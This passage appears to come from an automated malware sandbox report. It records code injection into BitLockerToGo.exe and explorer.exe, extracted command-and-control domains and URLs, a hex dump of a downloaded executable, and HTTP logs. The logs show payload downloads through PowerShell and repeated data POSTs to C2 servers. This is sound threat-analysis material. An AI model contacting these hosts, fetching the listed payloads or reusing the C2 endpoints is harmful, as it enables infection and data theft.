Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 14_2_004DB920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+08h] 14_2_004D1937
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+50h] 14_2_004E91C8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [00504970h] 14_2_004E41A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then lea ebp, dword ptr [esp+03h] 14_2_004E6210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [edx], 0000h 14_2_004D3A2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h 14_2_004D82CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 14_2_004C3A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004FB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004FB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004FB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 14_2_004DB360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esi+08h] 14_2_004D43E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h 14_2_004E4BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [00504A9Ch] 14_2_004E4BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 14_2_004F1BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h 14_2_004E33B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 14_2_004CE450
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004DEC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 14_2_004D1D52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 14_2_004C2DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 14_2_004E65F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004FB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004FB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004FB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 14_2_004D4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 14_2_004D4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 14_2_004D4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004D3678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 14_2_004D6EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then inc ebx 14_2_004D66B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov al, 01h 14_2_004FA706
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004FB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004FB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004FB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, word ptr [esi+eax] 14_2_004F6710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h 14_2_004E37B6

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 77.221.157.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.139 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.137 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.235.84 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 109.172.114.212 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 64.190.113.113 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 125.7.253.10 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 177.222.41.236 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 186.145.236.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 167.235.128.153 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.149.100.242 443 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
Source: Malware configuration extractor URLs: http://mzxn.ru/tmp/index.php
Source: Malware configuration extractor URLs: http://100xmargin.com/tmp/index.php
Source: Malware configuration extractor URLs: http://wgdnb4rc.xyz/tmp/index.php
Source: Malware configuration extractor URLs: http://olinsw.ws/tmp/index.php
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: rentry.co
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 05:30:08 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: "f1600-61ddb109e6b16"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c0 08 00 00 10 00 00 00 c0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 50 06 00 00 d0 08 00 00 4c 06 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 30 00 00 00 20 0f 00 00 02 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 00 10 00 00 00 50 0f 00 00 02 00 00 00 12 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 00 00 00 00 60 0f 00 00 02 00 00 00 14 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 77.221.157.163 77.221.157.163
Source: Joe Sandbox View IP Address: 107.173.160.139 107.173.160.139
Source: Joe Sandbox View IP Address: 107.173.160.137 107.173.160.137
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9363
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 155843
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1143
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1263
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20562Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1257Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569437Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
